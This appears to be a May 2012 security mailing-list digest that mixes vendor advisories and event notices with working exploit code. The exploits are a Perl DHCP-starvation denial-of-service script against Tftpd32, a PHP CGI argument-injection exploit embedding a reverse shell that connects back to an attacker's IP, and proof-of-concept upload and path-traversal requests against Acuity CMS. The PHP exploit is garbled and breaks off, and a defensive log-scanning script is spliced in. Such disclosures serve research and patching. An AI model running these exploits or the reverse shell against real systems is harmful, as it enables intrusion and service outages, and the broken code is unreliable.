Tftpd32 DHCP Server Denial Of Service Vulnerability
Title: Tftpd32 DHCP Server Denial Of Service Vulnerability
Software : Tftpd32
Software Version : v4.00
Vendor: http://tftpd32.jounin.net/
Vulnerability Published : 2012-05-21
Vulnerability Update Time :
Status :
Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
Tftpd32 is a free tftp and dhcp server for windows, freeware tftp server. The tftpd32's dhcp server does not identify whether the real source mac address of a dhcp discover packet is the same as the client hardware address in the payload of the dhcp discover packet, so that an attacker can make evil dhcp discover packets to cram the dhcp client list of the dhcp server, and then no one can gain an ip address from the dhcp server.

Solution :
Like other dhcp servers, the tftpd32's dhcp server can drop the dhcp discover packet when it detects a difference between the source mac address of the dhcp discover packet and the client hardware address in the payload of the dhcp discover packet.

Proof Of Concept :
---
#!/usr/bin/perl
use IO::Socket::INET;
use Net::DHCP::Packet;
use Net::DHCP::Constants;

$a=1;
while(1){
    print "\Request Number : $a\n";
    # Random 12-digit client hardware address, different on every request
    $mac=int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).
         int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9));
    $socket = IO::Socket::INET->new(
        Proto => 'udp',
        Broadcast => 1,
        LocalPort => 68,
        PeerAddr =>'255.255.255.255',
        PeerPort => 67,
    ) || die "Unable to create socket: $@\n";
    # The chaddr in the payload is $mac, not the sending interface's address
    $discover = Net::DHCP::Packet->new(
        xid => int rand(0x),
        Chaddr => $mac,
        DHO_DHCP_MESSAGE_TYPE() => DHCPDISCOVER(),
        DHO_VENDOR_CLASS_IDENTIFIER() => 'MyVendorClassID',
        DHO_DHCP_PARAMETER_REQUEST_LIST() => '1 2 6 12 15 28 67');
    $discover->addOptionRaw( 61, pack('H*',$mac));
    print "Sending DISCOVER to 255.255.255.255:67\n";
    $socket->send( $discover->serialize() ) or die "Unable to send Discover:$!\n";
    $socket->close();
    sleep(3);
    $a++;
}
exit(1);
---

Credits :
This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / chaoyi.hu...@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK
DC4420 - London DEFCON - May meet - Tuesday May 22nd 2012
Back at the Phoenix

Sorry for the late notice, but you know the score by now :)

Speakers:

'Why Industrial System air-gaps suck.'
Eireann Leverett of IOActive

A talk on why industrial systems can increasingly be found on the internet, and how to work with CERTs to change it.

We've also got room for a 30min fun talk, so ping me when you get there if you have one...

Venue is here:

The Phoenix
37 Cavendish Square
London W1G 0PP
http://www.phoenixcavendishsquare.co.uk/

2 minutes walk from Oxford Circus tube.

Date: Tuesday 22nd May 2012
Time: 17:30 till kicking out, talks start at 19:30

See you tomorrow!

cheers,
MM
--
"In DEFCON, we have no names..." errr... well, we do... but silly ones...
[Announcement] CHMag's Issue 28, May 2012 Released
Dear All,

Here we are with our 28th issue of ClubHack Magazine.

This issue covers the following articles:

0x00 Tech Gyan - Steganography over converted channels
0x01 Tool Gyan - Kautilya
0x02 Mom's Guide - HTTPS (Hyper Text Transfer Protocol Secure)
0x03 Legal Gyan - Section 66C - Punishment for identity theft
0x04 Code Gyan - Dont Get Injected Fix Your Code
0x05 Poster - "Look both side before crossing one way track"

Check http://chmag.in/ for articles.

The PDF version can be downloaded from: http://chmag.in/issue/may2012.pdf

Send us your feedback and articles at i...@chmag.in

Regards,
Team CHMag
http://chmag.in
[SECURITY] [DSA 2477-1] sympa security update
Debian Security Advisory DSA-2477-1
secur...@debian.org
http://www.debian.org/security/
Florian Weimer
May 20, 2012
http://www.debian.org/security/faq

Package : sympa
Vulnerability : authorization bypass
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-2352
Debian Bug :

Several vulnerabilities have been discovered in Sympa, a mailing list manager, that allow to skip the scenario-based authorization mechanisms. This vulnerability allows to display the archives management page, and download and delete the list archives by unauthorized users.

For the stable distribution (squeeze), this problem has been fixed in version 6.0.1+dfsg-4+squeeze1.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in version 6.1.11~dfsg-2.

We recommend that you upgrade your sympa packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version
# www.bugreport.ir
#
# Title: PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version
# Vendor: http://www.php.net
# Vulnerable Version: PHP up to version 5.3.12 and 5.4.2
# Exploitation: Remote
# Original Advisory: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
# Original Exploit URL: http://www.bugreport.ir/79/exploit.htm
# CVE:CVE-2012-1823
# Coded By: Mostafa Azizi (admin[@]0-Day[dot]net)
###
/* This tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 10);
ob_implicit_flush (1);
echo' PHP CGI Argument Injection Remote Exploit PHP CGI Argument Injection Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) Mass File Uploader Reverse Shell enctype="multipart/form-data" method="post"> Please specify a file to scan: size="40"> * Please specify a file to upload: size="40"> * specify a port (default is 80): class="Stile5"> Proxy (ip:port): class="Stile5"> color="#FF">* fields are required name="Submit"> enctype="multipart/form-data" method="post"> hostname (ex: www.sitename.com): class="Stile5"> Your IP (ex: 173.194.35.169 ): Your Port (ex: 80): class="Stile5"> color="#FF">All fields are required name="Submit2"> ';
$host= $_POST['host'];
$lip = $_POST['lip'];
$lport = $_POST['lport'];
$port= $_POST['port'];
$proxy = $_POST['proxy'];
$list= file($_FILES['listfile']['tmp_name']);
$file= base64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name'])));
$shell = "gzinflate(base64_decode(\"$file\"))";
if (isset($_POST['Submit2']) && $host != '' && $lip != '' && $lport != '') {
/*pentestmonkey's php-reverse-shell.
Limitations: proc_open and stream_set_blocking require PHP version 4.3+, or 5+ */ /* Connect Back */ $payload = "'$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null; \$error_a = null; \$shell = 'uname -a; w; id; /bin/sh -i'; \$daemon = 0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid = pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\"); exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) { printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else { printit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\"); exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process = proc_open(\$shell, \$descriptorspec, \$pipes);if (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); exit(1);}stream_set_blocking(\$pipes[0], 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], 0);stream_set_blocking(\$sock, 0);printit(\"Successfully opened reverse shell to \$ip:\$port\"); while (1) {if (feof(\$sock)) { printit(\"ERROR: Shell connection terminated\"); break;} if (feof(\$pipes[1])) {printit(\"ERROR: Shell process terminated\");break;}\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) printit(\"SOCK READ\");\$input = fread(\$sock, \$chunk_size);if(\$debug) printit(\"SOCK: \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input = fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input = fread(\$pipes[2], \$chunk_size);if (\$debug) printit(\"STDERR: \$input\");fwrite(\$sock, 
\$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print \"\$string\n\";}} ?>"; $packet = "POST ".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n";
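A detection sketch for the request line built at the end of the code above, added here as an example (not part of the original post): it scans web server access-log lines for request targets that php-cgi would interpret as command-line switches. It relies on the CGI convention, not spelled out on this page, that a query string with no unencoded "=" is split on "+" and passed as arguments; the log lines and addresses are constructed samples.

```python
import re
from urllib.parse import unquote

# Request line as it appears inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def injected_args(target):
    """Return the switches a request target would hand to php-cgi, or []."""
    _path, sep, query = target.partition("?")
    # A literal '=' makes the query an ordinary parameter list, not arguments.
    if not sep or not query or "=" in query:
        return []
    # Arguments are separated by '+'; decode before testing so that
    # percent-encoded characters are seen the way the CGI binary sees them.
    args = [unquote(part) for part in query.split("+")]
    if any(arg.lstrip().startswith("-") for arg in args):
        return args
    return []

def scan(lines):
    """Return (line_number, method, args) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        args = injected_args(match.group("target"))
        if args:
            hits.append((number, match.group("method"), args))
    return hits

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/May/2012:10:00:01 +0000] "GET /index.php?id=5 HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/May/2012:10:00:02 +0000] "POST /?-d+allow_url_include%3d1'
    '+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 94',
    '192.0.2.10 - - [21/May/2012:10:00:03 +0000] "GET /search.php?hello+world HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for number, method, args in scan(SAMPLE_LOG):
        print(f"line {number}: {method} would pass {args} to php-cgi")
```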
Acuity CMS 2.6.x <= Arbitrary File Upload
1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.

2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class.

3. VULNERABILITY DESCRIPTION

Acuity CMS 2.6.x (ASP-based) versions contain a flaw that may allow an attacker to upload .asp/.aspx files without restrictions, which will execute ASP(.Net) codes. The issue is due to the script, /admin/file_manager/file_upload_submit.asp, not properly sanitizing 'file1', 'file2', 'file3', 'fileX' parameters.

4. VERSIONS AFFECTED

Tested with version 2.6.2.

5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXX

-6dc3a236402e2
Content-Disposition: form-data; name="path"

/images
-6dc3a236402e2
Content-Disposition: form-data; name="rootpath"

/
-6dc3a236402e2
Content-Disposition: form-data; name="rootdisplay"

http://localhost/
-6dc3a236402e2
Content-Disposition: form-data; name="status"

confirmed
-6dc3a236402e2
Content-Disposition: form-data; name="action"

fileUpload
-6dc3a236402e2
Content-Disposition: form-data; name="file1"; filename="0wned.asp"
Content-Type: application/octet-stream

<% response.write("0wned!") %>
-6dc3a236402e2--
[/REQUEST]

6. SOLUTION

The Acuity CMS is no longer in active development. It is recommended to use another CMS in active development and support.

7. VENDOR

The Collective
http://www.thecollective.com.au/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed

10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload

#yehg [2012-05-20]
Acuity CMS 2.6.x <= Path Traversal Arbitrary File Access
1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Path Traversal.

2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class.

3. VULNERABILITY DESCRIPTION

The issue is due to the script, /admin/file_manager/browse.asp, not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied via the 'path' parameter. It would allow the attacker to access arbitrary files outside of the web root directory.

4. VERSIONS AFFECTED

Tested with version 2.6.2.

5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/admin/file_manager/browse.asp?field=&form=&path=../../

6. SOLUTION

The Acuity CMS is no longer in active development. It is recommended to use another CMS in active development and support.

7. VENDOR

The Collective
http://www.thecollective.com.au/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed

10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_path_traversal

#yehg [2012-05-20]
[SECURITY] [DSA 2476-1] pidgin-otr security update
Debian Security Advisory DSA-2476-1
secur...@debian.org
http://www.debian.org/security/
Jonathan Wiltshire
May 19, 2012
http://www.debian.org/security/faq

Package : pidgin-otr
Vulnerability : format string vulnerability
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-2369
Debian Bug : 673154

intrigeri discovered a format string error in pidgin-otr, an off-the-record messaging plugin for Pidgin.

This could be exploited by a remote attacker to cause arbitrary code to be executed on the user's machine.

The problem is only in pidgin-otr. Other applications which use libotr are not affected.

For the stable distribution (squeeze), this problem has been fixed in version 3.2.0-5+squeeze1.

For the testing distribution (wheezy), this problem has been fixed in version 3.2.1-1.

For the unstable distribution (sid), this problem has been fixed in version 3.2.1-1.

We recommend that you upgrade your pidgin-otr packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
Call for Papers: The 7th International Conference for Internet Technology and Secured Transactions (ICITST-2012)
Apologies for cross-postings. Kindly email this call for papers to your colleagues, faculty members and postgraduate students.

CALL FOR PAPERS

The 7th International Conference for Internet Technology and Secured Transactions (ICITST-2012)
Technical Co-Sponsored by IEEE UK/RI Computer Chapter
December 10-12, 2012, London, United Kingdom
www.icitst.org

The 7th International Conference for Internet Technology and Secured Transactions (ICITST-2012) is Technical Co-Sponsored by IEEE UK/RI Computer Chapter. The ICITST is an international refereed conference dedicated to the advancement of the theory and practical implementation of secured Internet transactions and to fostering discussions on information technology evolution. The ICITST aims to provide a highly professional and comparative academic research forum that promotes collaborative excellence between academia and industry. The objectives of the ICITST are to bridge the knowledge gap between academia and industry, promote research esteem in secured Internet transactions and the importance of information technology evolution to secured transactions. The ICITST-2012 invites research papers that encompass conceptual analysis, design implementation and performance evaluation.

The topics in ICITST-2012 include but are not confined to the following areas:

1. Internet Application and Technology
Internet technologies, Internet Architecture, Internet of things, Broadband Access Technologies, Application Agents, Boundary Issues of Internet Security, Database Management, Data Models for Production Systems and Services, Artificial Intelligence and Expert Systems, IPSec Quality of Service, Knowledge Management, Embedded Systems, Defence Systems

2. Information Security
Collaborative Learning, Trust, Privacy and Data Security, Network Security Issues and Protocols, Security Challenges and Content Authoring, Cryptography, Secure Communications, Authentication Techniques, Chaos-based Data Security, MANET Security, Wireless Sensor Network Security, Organization Considerations in Security Policy Formulation and Implementations, Digital Forensics and Crimes, Biometrics, Cyber Security

3. Ubi/Cloud Computing
Authentication and Access Control for Data Protection in Ubi/Cloud Computing, Context-Awareness and its Data Mining for UbiCom, Data Grids, Distributed Information Systems, Human-Computer Interface and Interaction for UbiCom, Ubiquitous Systems, USN/RFID Service, Smart Homes and its Business Model for UbiCom Service, Security and Data Management for UbiCom, Peer to Peer Data Management, New Novel Mechanism and Application for Ubi/Cloud Computing

4. Infonomics and e-Technology
Infonomics, Information Visualization, Information Management, Information Quality Technology Enabled Information, e-Learning, e-Commerce, e-Business, e-Government, e-Society, System Design and Security for e-Services, Synchronizing e-Security

5. Multimedia and Web Services
Intelligent Multimedia and its Data Management, Multimedia Information Systems, Multimedia Security, Web Databases, Web Metrics and its Applications, Web Mining including Web Intelligence and Web 3.0., Web Services, XML and other extensible languages, Semantic Web and Ontology

6. Cloud Security
Secure Virtual Infrastructure and Private Cloud, Cryptographic Enforcement of Multi-Tenancy, Cloud Requirements for PaaS and SaaS, Security Policy and Privacy Requirements, Cloud Audit Protocol

7. Research in Progress
Ongoing research from undergraduates, graduates/postgraduates and professionals, Collaborative Research, Future Technologies

Submission Guidelines

The authors are invited to submit papers based on their original work not exceeding 6 pages in length for full papers (including all figures, tables and references). Additional pages cost GBP £25.00 per page with a maximum of 2 pages. We also encourage submissions of proposals for tutorials, workshops and special tracks. Details on the submission procedure are available at http://www.icitst.org/Paper%20Submission.html

The extended abstract should not exceed 2 pages (including introduction, body of knowledge and conclusion, supported by not more than 10 references). Please submit your extended abstract in PDF format at extendedabstr...@icitst.org

Important Dates

Full Paper Submission: August 01, 2012
Extended Abstract Submission: August 15, 2012
Tutorial, Workshop and Special Track Proposal Submission: August 31, 2012
Notification of Paper Acceptance: September 25, 2012

For further details, please visit www.icitst.org
[ MDVSA-2012:079 ] sudo
Mandriva Linux Security Advisory MDVSA-2012:079
http://www.mandriva.com/security/

Package : sudo
Date: May 21, 2012
Affected: 2010.1, 2011., Enterprise Server 5.0

Problem Description:

A vulnerability has been found and corrected in sudo:

A flaw exists in the IP network matching code in sudo versions 1.6.9p3 through 1.8.4p4 that may result in the local host being matched even though it is not actually part of the network described by the IP address and associated netmask listed in the sudoers file or in LDAP. As a result, users authorized to run commands on certain IP networks may be able to run commands on hosts that belong to other networks not explicitly listed in sudoers (CVE-2012-2337).

The updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2337
http://www.sudo.ws/sudo/alerts/netmask.html

Updated Packages:

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team